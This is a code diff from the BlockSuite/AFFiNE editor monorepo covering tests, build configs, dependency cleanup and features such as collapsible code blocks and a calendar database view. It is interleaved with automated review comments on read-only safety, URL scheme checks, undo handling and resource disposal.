overallRect: { x: 0, y: 0, w: 50, h: 20 },
};
const paintPlaceholderForTest =
paintPlaceholder as unknown as PaintPlaceholderForTest;
paintPlaceholderForTest(canvas, layout, {
zoom: 0.4,
toViewCoord: () => [0, 0],
});
expect(fillStyle).toBe('rgba(0, 0, 0, 0.04)');
expect(strokeStyle).toBe('rgba(0, 0, 0, 0.02)');
expect(fillRect).toHaveBeenLastCalledWith(0, 0, 20, 8);
paintPlaceholderForTest(canvas, layout, {
zoom: 0.95,
toViewCoord: () => [0, 0],
});
expect(fillRect).toHaveBeenLastCalledWith(0, 0, 95, 38);
} finally {
document.documentElement.dataset.theme = previousTheme;
}
});
});
@@ -0,0 +1,34 @@
import { ColorScheme } from '@blocksuite/affine-model';
import { describe, expect, it } from 'vitest';
import {
getAffinePlaceholderFillColor,
getAffinePlaceholderStrokeColor,
inferColorSchemeFromThemeMode,
} from '../../../../shared/src/theme/placeholder-style.js';
describe('affine placeholder style', () => {
it('returns subtle light placeholder colors', () => {
expect(getAffinePlaceholderFillColor(ColorScheme.Light)).toBe(
'rgba(0, 0, 0, 0.04)'
);
expect(getAffinePlaceholderStrokeColor(ColorScheme.Light)).toBe(
'rgba(0, 0, 0, 0.02)'
);
});
it('returns subtle dark placeholder colors', () => {
expect(getAffinePlaceholderFillColor(ColorScheme.Dark)).toBe(
'rgba(255, 255, 255, 0.08)'
);
expect(getAffinePlaceholderStrokeColor(ColorScheme.Dark)).toBe(
'rgba(255, 255, 255, 0.04)'
);
});
it('infers color scheme from theme mode', () => {
expect(inferColorSchemeFromThemeMode('dark')).toBe(ColorScheme.Dark);
expect(inferColorSchemeFromThemeMode('light')).toBe(ColorScheme.Light);
expect(inferColorSchemeFromThemeMode('')).toBe(ColorScheme.Light);
});
});
@@ -0,0 +1,66 @@
import { describe, expect, test } from 'vitest';
import * as turboRendererModule from '../../../../gfx/turbo-renderer/src/turbo-renderer.js';
describe('viewport turbo renderer policy', () => {
test.each([
{ isIOS: true, zoom: 0.4, hasBitmap: true, expected: true },
{ isIOS: true, zoom: 0.4, hasBitmap: false, expected: false },
{ isIOS: false, zoom: 0.4, hasBitmap: true, expected: false },
{ isIOS: true, zoom: 0.8, hasBitmap: true, expected: false },
])(
'prefers cached bitmap only for iOS low-zoom gestures with a bitmap %#',
({ isIOS, zoom, hasBitmap, expected }) => {
expect(
'shouldPreferBitmapCacheDuringLowZoomGesture' in turboRendererModule
).toBe(true);
const shouldPreferBitmapCacheDuringLowZoomGesture = (
turboRendererModule as {
shouldPreferBitmapCacheDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
hasBitmap: boolean;
}) => boolean;
}
).shouldPreferBitmapCacheDuringLowZoomGesture;
expect(
shouldPreferBitmapCacheDuringLowZoomGesture({
isIOS,
zoom,
hasBitmap,
})
).toBe(expected);
}
);
test.each([
{ isIOS: true, zoom: 0.4, expected: false },
{ isIOS: true, zoom: 0.8, expected: true },
{ isIOS: false, zoom: 0.4, expected: true },
])(
'idles turbo blocks outside iOS low-zoom survival mode %#',
({ isIOS, zoom, expected }) => {
expect('shouldIdleTurboBlocksDuringZooming' in turboRendererModule).toBe(
true
);
const shouldIdleTurboBlocksDuringZooming = (
turboRendererModule as {
shouldIdleTurboBlocksDuringZooming: (params: {
isIOS: boolean;
zoom: number;
}) => boolean;
}
).shouldIdleTurboBlocksDuringZooming;
expect(
shouldIdleTurboBlocksDuringZooming({
isIOS,
zoom,
})
).toBe(expected);
}
);
});
+1 -1
@@ -1,3 +1,3 @@
/* eslint-disable @typescript-eslint/no-restricted-imports */
/* oxlint-disable no-restricted-imports */
export * from '@blocksuite/store';
+6 -2
@@ -1,3 +1,5 @@
import { fileURLToPath } from 'node:url';
import { vanillaExtractPlugin } from '@vanilla-extract/vite-plugin';
import { defineConfig } from 'vitest/config';
@@ -7,11 +9,13 @@ export default defineConfig({
},
plugins: [vanillaExtractPlugin()],
test: {
globalSetup: '../../../scripts/vitest-global.js',
globalSetup: fileURLToPath(
new URL('../../../scripts/vitest-global.js', import.meta.url)
),
include: ['src/__tests__/**/*.unit.spec.ts'],
testTimeout: 1000,
coverage: {
provider: 'istanbul', // or 'c8'
provider: 'istanbul',
reporter: ['lcov'],
reportsDirectory: '../../../.coverage/blocksuite-affine',
},
@@ -21,14 +21,10 @@
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"file-type": "^21.0.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"rxjs": "^7.8.2"
},
"exports": {
".": "./src/index.ts",
@@ -41,5 +37,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -5,6 +5,7 @@ import {
import {
BlockMarkdownAdapterExtension,
type BlockMarkdownAdapterMatcher,
createAttachmentBlockSnapshot,
FOOTNOTE_DEFINITION_PREFIX,
getFootnoteDefinitionText,
isFootnoteDefinitionNode,
@@ -56,18 +57,15 @@ export const attachmentBlockMarkdownAdapterMatcher: BlockMarkdownAdapterMatcher
}
walkerContext
.openNode(
{
type: 'block',
createAttachmentBlockSnapshot({
id: nanoid(),
flavour: AttachmentBlockSchema.model.flavour,
props: {
name: fileName,
sourceId: blobId,
footnoteIdentifier,
style: 'citation',
},
children: [],
},
}),
'children'
)
.closeNode();
@@ -54,7 +54,7 @@ type AttachmentResolvedStateInfo = ResolvedStateInfo & {
@Peekable({
enableOn: ({ model }: AttachmentBlockComponent) => {
return !model.store.readonly && model.props.type.endsWith('pdf');
return model.props.type.endsWith('pdf');
},
})
export class AttachmentBlockComponent extends CaptionedBlockComponent<AttachmentBlockModel> {
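Review bot: Dropping `!model.store.readonly` from `enableOn` makes PDF peek available in read-only documents, so the peek view now has to be safe to open without write access. Please confirm, ideally with a test, that nothing on the peek path mutates the store when `model.store.readonly` is true, and state the intent in the commit message. Separately, `model.props.type.endsWith('pdf')` is a suffix match on a stored string, so any type value ending in `pdf` qualifies; if `type` holds a MIME type, comparing against the exact value would be stricter.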
@@ -144,7 +144,7 @@ export const attachmentViewDropdownMenu = {
@toggle=${onToggle}
.actions=${actions.value}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`;
},
} as const satisfies ToolbarActionGroup<ToolbarAction>;
@@ -366,7 +366,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${style$}
.styleSignal=${style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -22,17 +22,16 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
"yjs": "^13.6.27"
},
"devDependencies": {
"vitest": "^3.2.4"
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"vitest": "^4.1.8"
},
"exports": {
".": "./src/index.ts",
@@ -45,5 +44,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -108,7 +108,9 @@ export class BookmarkBlockComponent extends CaptionedBlockComponent<BookmarkBloc
}
open = () => {
window.open(this.link, '_blank');
const link = this.link;
if (!link) return;
window.open(link, '_blank', 'noopener,noreferrer');
};
refreshData = () => {
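Review bot: In `open`, `link` still reaches `window.open` without a scheme check. The new falsy guard and the `'noopener,noreferrer'` features keep the opened page from getting a handle on `window.opener`, but they do not constrain what kind of URL is opened. If `this.link` can hold user-supplied or imported values, parse it with `new URL(link)` and return unless `protocol` is `http:` or `https:`, so an unexpected scheme is never opened from a bookmark click.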
@@ -237,7 +237,7 @@ const builtinToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`
)}`;
},
@@ -282,7 +282,7 @@ const builtinToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${model.props.style$}
.styleSignal=${model.props.style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -472,7 +472,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`
)}`;
},
@@ -534,7 +534,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${style$}
.styleSignal=${style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -591,7 +591,7 @@ const builtinSurfaceToolbarConfig = {
@select=${onSelect}
@toggle=${onToggle}
.format=${format}
.size$=${scale$}
.sizeSignal=${scale$}
></affine-size-dropdown-menu>`
)}`;
},
@@ -1,3 +1,4 @@
import { playwright } from '@vitest/browser-playwright';
import { defineConfig } from 'vitest/config';
export default defineConfig({
@@ -8,10 +9,9 @@ export default defineConfig({
browser: {
enabled: true,
headless: true,
name: 'chromium',
provider: 'playwright',
instances: [{ browser: 'chromium' }],
provider: playwright(),
isolate: false,
providerOptions: {},
},
include: ['src/__tests__/**/*.unit.spec.ts'],
testTimeout: 500,
+2 -11
@@ -17,22 +17,13 @@
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/affine-widget-slash-menu": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@emoji-mart/data": "^1.2.1",
"@emotion/css": "^11.13.5",
"@floating-ui/dom": "^1.6.10",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"emoji-mart": "^5.6.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
@@ -45,5 +36,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -216,9 +216,13 @@ export class CalloutBlockComponent extends CaptionedBlockComponent<CalloutBlockM
override renderBlock() {
const icon = this.model.props.icon$.value;
const backgroundColorName = this.model.props.backgroundColorName$.value;
const normalizedBackgroundName =
backgroundColorName === 'default' || backgroundColorName === ''
? 'grey'
: backgroundColorName;
const backgroundColor = (
cssVarV2.block.callout.background as Record<string, string>
)[backgroundColorName ?? ''];
)[normalizedBackgroundName ?? 'grey'];
const iconContent = getIcon(icon);
@@ -68,14 +68,14 @@ const backgroundColorAction = {
${repeat(colors, color => {
const isDefault = color === 'default';
const value = isDefault
? null
? cssVarV2.block.callout.background.grey
: `var(--affine-text-highlight-${color})`;
const displayName = `${color} Background`;
return html`
<editor-menu-action
data-testid="background-${color}"
@click=${() => updateBackground(color)}
@click=${() => updateBackground(isDefault ? 'grey' : color)}
>
<affine-text-duotone-icon
style=${styleMap({
@@ -25,4 +25,4 @@ export const calloutTooltip = html`<svg width="170" height="106" viewBox="0 0 17
</clipPath>
</defs>
</svg>
`
`;
@@ -14,7 +14,6 @@
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../widgets/slash-menu" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
]
+1 -5
@@ -26,13 +26,9 @@
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"shiki": "^3.19.0",
"zod": "^3.25.76"
},
@@ -48,5 +44,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -1,4 +1,5 @@
import { deleteTextCommand } from '@blocksuite/affine-inline-preset';
import type { RichText } from '@blocksuite/affine-rich-text';
import {
HtmlAdapter,
pasteMiddleware,
@@ -18,6 +19,7 @@ import {
LifeCycleWatcher,
LifeCycleWatcherIdentifier,
StdIdentifier,
TextSelection,
type UIEventHandler,
} from '@blocksuite/std';
import type { ExtensionType } from '@blocksuite/store';
@@ -103,6 +105,30 @@ export class CodeBlockClipboardController extends LifeCycleWatcher {
const e = ctx.get('clipboardState').raw;
e.preventDefault();
const textSelection = this.std.selection.find(TextSelection);
const plainText = e.clipboardData
?.getData('text/plain')
?.replace(/\r?\n|\r/g, '\n');
const selectedBlockId = textSelection?.from.blockId;
const codeBlock = selectedBlockId
? this.std.store.getBlock(selectedBlockId)?.model
: null;
if (plainText && codeBlock?.flavour === 'affine:code' && selectedBlockId) {
const richText = this.std.view
.getBlock(selectedBlockId)
?.querySelector<RichText>('rich-text');
const inlineEditor = richText?.inlineEditor;
const inlineRange = inlineEditor?.getInlineRange();
if (inlineEditor && inlineRange) {
inlineEditor.insertText(inlineRange, plainText);
inlineEditor.setInlineRange({
index: inlineRange.index + plainText.length,
length: 0,
});
return true;
}
}
this.std.store.captureSync();
this.std.command
.chain()
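Review bot: The new code-block fast path returns `true` before `this.std.store.captureSync()` runs, so text pasted through `inlineEditor.insertText` is not split into its own undo step the way the existing path below is; call `captureSync()` before the insert unless merging is intended. The guard also looks only at `textSelection?.from.blockId`, so a selection that starts in an `affine:code` block and ends in a different block takes this path too. Check the end of the selection as well and fall through to the command chain when it spans blocks.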
@@ -39,10 +39,7 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
private readonly _loadTheme = async (
highlighter: HighlighterCore
): Promise<void> => {
// It is possible that by the time the highlighter is ready all instances
// have already been unmounted. In that case there is no need to load
// themes or update state.
if (CodeBlockHighlighter._refCount === 0) {
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
@@ -51,7 +48,17 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
const lightTheme = config?.theme?.light ?? CODE_BLOCK_DEFAULT_LIGHT_THEME;
this._darkThemeKey = (await normalizeGetter(darkTheme)).name;
this._lightThemeKey = (await normalizeGetter(lightTheme)).name;
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
await highlighter.loadTheme(darkTheme, lightTheme);
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
this.highlighter$.value = highlighter;
};
@@ -83,30 +90,18 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
}
override unmounted(): void {
CodeBlockHighlighter._refCount--;
CodeBlockHighlighter._refCount = Math.max(
0,
CodeBlockHighlighter._refCount - 1
);
this.highlighter$.value = null;
}
// Dispose the shared highlighter **after** any in-flight creation finishes.
if (CodeBlockHighlighter._refCount !== 0) {
return;
}
const doDispose = (highlighter: HighlighterCore | null) => {
if (highlighter) {
highlighter.dispose();
}
CodeBlockHighlighter._sharedHighlighter = null;
CodeBlockHighlighter._highlighterPromise = null;
};
if (CodeBlockHighlighter._sharedHighlighter) {
// Highlighter already created dispose immediately.
doDispose(CodeBlockHighlighter._sharedHighlighter);
} else if (CodeBlockHighlighter._highlighterPromise) {
// Highlighter still being created wait for it, then dispose.
CodeBlockHighlighter._highlighterPromise
.then(doDispose)
.catch(console.error);
}
private static _isHighlighterInUse(highlighter: HighlighterCore) {
return (
CodeBlockHighlighter._refCount > 0 &&
CodeBlockHighlighter._sharedHighlighter === highlighter
);
}
}
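Review bot: `unmounted` no longer releases anything. The `doDispose` branch that called `highlighter.dispose()` and cleared `_sharedHighlighter` and `_highlighterPromise` is gone, so once `_refCount` reaches 0 the shared highlighter stays allocated for the life of the page. If that is deliberate, to avoid the dispose-while-creating race the removed comments describe, say so in a comment next to `_refCount`; otherwise keep a dispose path for the zero-reference case. The `Math.max(0, ...)` clamp also hides an unbalanced `unmounted` call, which would be worth a warning in development builds rather than silent correction.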
@@ -51,6 +51,10 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
return modelPreview;
});
collapsed$: Signal<boolean> = computed(
() => !!this.model.props.collapsed$.value
);
highlightTokens$: Signal<ThemedToken[][]> = signal([]);
languageName$: Signal<string> = computed(() => {
@@ -417,6 +421,7 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
CodeBlockPreviewIdentifier(this.model.props.language ?? '')
);
const shouldRenderPreview = preview && previewContext;
const collapsed = this.collapsed$.value;
return html`
<div
@@ -426,6 +431,7 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
mobile: IS_MOBILE,
wrap: this.model.props.wrap,
'disable-line-numbers': !showLineNumbers,
collapsed,
})}
>
<rich-text
@@ -453,9 +459,12 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
}}
>
</rich-text>
${collapsed
? html`<div class="code-collapsed-fade" aria-hidden="true"></div>`
: nothing}
<div
style=${styleMap({
display: shouldRenderPreview ? undefined : 'none',
display: shouldRenderPreview && !collapsed ? undefined : 'none',
})}
contenteditable="false"
class="affine-code-block-preview"
@@ -471,6 +480,10 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
this.store.updateBlock(this.model, { wrap });
}
setCollapsed(collapsed: boolean) {
this.store.updateBlock(this.model, { collapsed });
}
@query('rich-text')
private accessor _richTextElement: RichText | null = null;
@@ -9,9 +9,9 @@ import { WithDisposable } from '@blocksuite/global/lit';
import { noop } from '@blocksuite/global/utils';
import { MoreVerticalIcon } from '@blocksuite/icons/lit';
import { flip, offset } from '@floating-ui/dom';
import { effect } from '@preact/signals-core';
import { css, html, LitElement } from 'lit';
import { property, query, state } from 'lit/decorators.js';
import { styleMap } from 'lit/directives/style-map.js';
import type { CodeBlockToolbarContext } from '../context.js';
@@ -82,18 +82,10 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
createLitPortal({
template: html`
<editor-menu-content
data-show
class="more-popup-menu"
style=${styleMap({
'--content-padding': '8px',
'--packed-height': '4px',
})}
>
<div data-size="large" data-orientation="vertical">
${renderGroups(this.moreGroups, this.context)}
</div>
</editor-menu-content>
<affine-code-more-menu
.context=${this.context}
.moreGroups=${this.moreGroups}
></affine-code-more-menu>
`,
// should be greater than block-selection z-index as selection and popover wil share the same stacking context(editor-host)
portalStyles: {
@@ -117,6 +109,17 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
this.closeCurrentMenu();
}
override connectedCallback() {
super.connectedCallback();
// Mirror the collapsed$ signal from the block component into local @state
// so this LitElement re-renders when it changes.
this.disposables.add(
effect(() => {
this._collapsed = this.context.blockComponent.collapsed$.value;
})
);
}
override render() {
return html`
<editor-toolbar class="code-toolbar-container" data-without-bg>
@@ -145,6 +148,9 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
@state()
private accessor _moreMenuOpen = false;
@state()
private accessor _collapsed = false;
@property({ attribute: false })
accessor context!: CodeBlockToolbarContext;
@@ -0,0 +1,52 @@
import type { MenuItemGroup } from '@blocksuite/affine-components/toolbar';
import { renderGroups } from '@blocksuite/affine-components/toolbar';
import { SignalWatcher, WithDisposable } from '@blocksuite/global/lit';
import { ShadowlessElement } from '@blocksuite/std';
import { html } from 'lit';
import { property } from 'lit/decorators.js';
import { styleMap } from 'lit/directives/style-map.js';
import type { CodeBlockToolbarContext } from '../context.js';
export class AffineCodeMoreMenu extends SignalWatcher(
WithDisposable(ShadowlessElement)
) {
override firstUpdated() {
this.disposables.add(
this.context.blockComponent.model.propsUpdated.subscribe(({ key }) => {
if (key === 'wrap' || key === 'lineNumber') {
this.requestUpdate();
}
})
);
}
override render() {
return html`
<editor-menu-content
data-show
class="more-popup-menu"
style=${styleMap({
'--content-padding': '8px',
'--packed-height': '4px',
})}
>
<div data-size="large" data-orientation="vertical">
${renderGroups(this.moreGroups, this.context)}
</div>
</editor-menu-content>
`;
}
@property({ attribute: false })
accessor context!: CodeBlockToolbarContext;
@property({ attribute: false })
accessor moreGroups!: MenuItemGroup<CodeBlockToolbarContext>[];
}
declare global {
interface HTMLElementTagNameMap {
'affine-code-more-menu': AffineCodeMoreMenu;
}
}
@@ -1,9 +1,11 @@
import {
CancelWrapIcon,
CaptionIcon,
CollapseCodeIcon,
CopyIcon,
DeleteIcon,
DuplicateIcon,
ExpandCodeIcon,
WrapIcon,
} from '@blocksuite/affine-components/icons';
import type { MenuItemGroup } from '@blocksuite/affine-components/toolbar';
@@ -85,6 +87,38 @@ export const PRIMARY_GROUPS: MenuItemGroup<CodeBlockToolbarContext>[] = [
};
},
},
{
type: 'collapse',
when: ({ doc }) => !doc.readonly,
generate: ({ blockComponent }) => {
return {
action: () => {
blockComponent.setCollapsed(!blockComponent.collapsed$.value);
},
render: item => {
const collapsed = blockComponent.collapsed$.value;
const icon = collapsed ? ExpandCodeIcon : CollapseCodeIcon;
const label = collapsed ? 'Expand code' : 'Collapse code';
return html`
<editor-icon-button
class="code-toolbar-button collapse"
aria-label=${label}
.tooltip=${label}
.tooltipOffset=${4}
.iconSize=${'16px'}
.iconContainerPadding=${4}
@click=${(e: MouseEvent) => {
e.stopPropagation();
item.action();
}}
>
${icon}
</editor-icon-button>
`;
},
};
},
},
{
type: 'caption',
label: 'Caption',
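Review bot: The `collapse` entry is gated by `when: ({ doc }) => !doc.readonly`, but its action goes through `blockComponent.setCollapsed`, which persists `collapsed` on the block with `store.updateBlock`. A reader of a read-only document that contains a collapsed block therefore gets no control to expand it and sees only what the collapsed styles leave visible. Either keep the toggle available in read-only mode backed by view-local state, or ignore the stored `collapsed` value when `doc.readonly` is true.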
@@ -174,7 +208,8 @@ export const toggleGroup: MenuItemGroup<CodeBlockToolbarContext> = {
return html`
<editor-menu-action
@click=${() => {
blockComponent.setWrap(!wrapped);
const currentWrap = blockComponent.model.props.wrap;
blockComponent.setWrap(!currentWrap);
}}
aria-label=${label}
>
@@ -204,8 +239,10 @@ export const toggleGroup: MenuItemGroup<CodeBlockToolbarContext> = {
return html`
<editor-menu-action
@click=${() => {
const currentLineNumber =
blockComponent.model.props.lineNumber ?? true;
blockComponent.store.updateBlock(blockComponent.model, {
lineNumber: !lineNumber,
lineNumber: !currentLineNumber,
});
}}
aria-label=${label}
@@ -5,12 +5,14 @@ import {
} from './code-toolbar';
import { AffineCodeToolbar } from './code-toolbar/components/code-toolbar';
import { LanguageListButton } from './code-toolbar/components/lang-button';
import { AffineCodeMoreMenu } from './code-toolbar/components/more-menu';
import { PreviewButton } from './code-toolbar/components/preview-button';
import { AffineCodeUnit } from './highlight/affine-code-unit';
export function effects() {
customElements.define('language-list-button', LanguageListButton);
customElements.define('affine-code-toolbar', AffineCodeToolbar);
customElements.define('affine-code-more-menu', AffineCodeMoreMenu);
customElements.define(AFFINE_CODE_TOOLBAR_WIDGET, AffineCodeToolbarWidget);
customElements.define('affine-code-unit', AffineCodeUnit);
customElements.define('affine-code', CodeBlockComponent);
@@ -21,6 +23,7 @@ declare global {
interface HTMLElementTagNameMap {
'language-list-button': LanguageListButton;
'affine-code-toolbar': AffineCodeToolbar;
'affine-code-more-menu': AffineCodeMoreMenu;
'preview-button': PreviewButton;
[AFFINE_CODE_TOOLBAR_WIDGET]: AffineCodeToolbarWidget;
}
@@ -45,8 +45,10 @@ export class AffineCodeUnit extends ShadowlessElement {
if (!codeBlock || !vElement) return plainContent;
const tokens = codeBlock.highlightTokens$.value;
if (tokens.length === 0) return plainContent;
const line = tokens[vElement.lineIndex];
if (!line) return plainContent;
// copy the tokens to avoid modifying the original tokens
const lineTokens = structuredClone(tokens[vElement.lineIndex]);
const lineTokens = structuredClone(line);
if (lineTokens.length === 0) return plainContent;
const startOffset = vElement.startOffset;
@@ -27,6 +27,16 @@ export const codeBlockStyles = css`
${scrollbarStyle('.affine-code-block-container rich-text')}
/* In Chromium 121+, non-auto scrollbar-width/color override ::-webkit-scrollbar styles. */
@supports not selector(::-webkit-scrollbar) {
.affine-code-block-container rich-text {
scrollbar-width: thin;
scrollbar-color: ${unsafeCSSVarV2('icon/secondary', '#b1b1b1')}
transparent;
scrollbar-gutter: stable both-edges;
}
}
.affine-code-block-container .inline-editor {
font-family: var(--affine-font-code-family);
font-variant-ligatures: none;
@@ -70,4 +80,35 @@ export const codeBlockStyles = css`
affine-code .affine-code-block-preview {
padding: 12px;
}
/* ── Collapsed state ──────────────────────────────────────────────── */
/* Clamp the rich-text to the first 8 lines */
.affine-code-block-container.collapsed rich-text {
display: block;
max-height: calc(8 * var(--affine-line-height));
overflow: hidden;
}
/* Reduce bottom padding so the fade sits flush with the border */
.affine-code-block-container.collapsed {
padding-bottom: 0;
}
/* Gradient overlay that fades to the block background */
.affine-code-block-container .code-collapsed-fade {
position: absolute;
bottom: 0;
left: 0;
right: 0;
height: 80px;
background: linear-gradient(
to bottom,
transparent,
var(--affine-background-code-block)
);
border-radius: 0 0 10px 10px;
pointer-events: none;
z-index: 1;
}
`;
@@ -21,15 +21,9 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"rxjs": "^7.8.2"
},
"exports": {
".": "./src/index.ts",
@@ -42,5 +36,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -254,6 +254,7 @@ export class DataViewBlockComponent extends CaptionedBlockComponent<DataViewBloc
dataSource: this.dataSource,
headerWidget: this.headerWidget,
clipboard: this.std.clipboard,
dnd: this.std.dnd,
notification: {
toast: message => {
const notification = this.std.getOptional(NotificationProvider);
@@ -26,14 +26,11 @@
"@blocksuite/store": "workspace:*",
"@emotion/css": "^11.13.5",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"date-fns": "^4.0.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
},
@@ -48,5 +45,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -54,9 +54,9 @@ type Cell = {
value: string | { delta: DeltaInsert[] };
};
export const processTable = (
columns: ColumnDataType[],
children: BlockSnapshot[],
cells: SerializedCells
columns: ColumnDataType[] = [],
children: BlockSnapshot[] = [],
cells: SerializedCells = {}
): Table => {
const table: Table = {
headers: columns,
@@ -90,13 +90,17 @@ export const processTable = (
return;
}
let value: string | { delta: DeltaInsert[] };
if (isDelta(cell.value)) {
value = cell.value;
} else {
value = property.config.rawValue.toString({
value: cell.value,
data: col.data,
});
try {
if (isDelta(cell.value)) {
value = cell.value;
} else {
value = property.config.rawValue.toString({
value: cell.value,
data: col.data,
});
}
} catch {
value = '';
}
row.cells.push({
value,
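Review bot: The bare `catch { value = ''; }` around `property.config.rawValue.toString` turns every conversion failure into an empty cell with no trace, which makes silent data loss in the resulting table hard to notice. Keep the fallback, but bind the error and log it together with the column that failed (for example `console.warn` with the property type), so a cell that becomes `''` can be traced back to its cause. Since `isDelta(cell.value)` is inside the same `try`, a failure there is swallowed as well; narrowing the `try` to the `toString` call would make the intent clearer.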
@@ -6,6 +6,7 @@ import { viewPresets } from '@blocksuite/data-view/view-presets';
import {
DatabaseKanbanViewIcon,
DatabaseTableViewIcon,
TodayIcon,
} from '@blocksuite/icons/lit';
import { insertDatabaseBlockCommand } from '../commands';
@@ -47,6 +48,35 @@ export const databaseSlashMenuConfig: SlashMenuConfig = {
},
},
{
name: 'Calendar View',
description: 'Display items by date in a calendar.',
searchAlias: ['database', 'calendar'],
icon: TodayIcon(),
group: '7_Database@1',
when: ({ model }) =>
!isInsideBlockByFlavour(model.store, model, 'affine:edgeless-text'),
action: ({ std }) => {
std.command
.chain()
.pipe(getSelectedModelsCommand)
.pipe(insertDatabaseBlockCommand, {
viewType: viewPresets.calendarViewMeta.type,
place: 'after',
removeEmptyLine: true,
})
.pipe(({ insertedDatabaseBlockId }) => {
if (insertedDatabaseBlockId) {
const telemetry = std.getOptional(TelemetryProvider);
telemetry?.track('BlockCreated', {
blockType: 'affine:database',
});
}
})
.run();
},
},
{
name: 'Kanban View',
description: 'Visualize data in a dashboard.',
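Review bot: the `BlockCreated` event in the new Calendar View action carries only `blockType: 'affine:database'`, so a calendar insert cannot be told apart from any other database insert in telemetry. If per-view usage matters, add the view type to the tracked payload. If the neighbouring Table and Kanban entries run the same command chain, a shared helper that takes `viewType` would keep the three actions from drifting apart.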
@@ -34,6 +34,7 @@ import {
type SingleView,
uniMap,
} from '@blocksuite/data-view';
import { CalendarExternalSourceProvider } from '@blocksuite/data-view/view-presets';
import { widgetPresets } from '@blocksuite/data-view/widget-presets';
import { IS_MOBILE } from '@blocksuite/global/env';
import { Rect } from '@blocksuite/global/gfx';
@@ -150,6 +151,14 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
config
);
});
this.std.provider
.getAll(CalendarExternalSourceProvider)
.forEach(source => {
dataSource.serviceSet(
CalendarExternalSourceProvider(source.id),
source
);
});
});
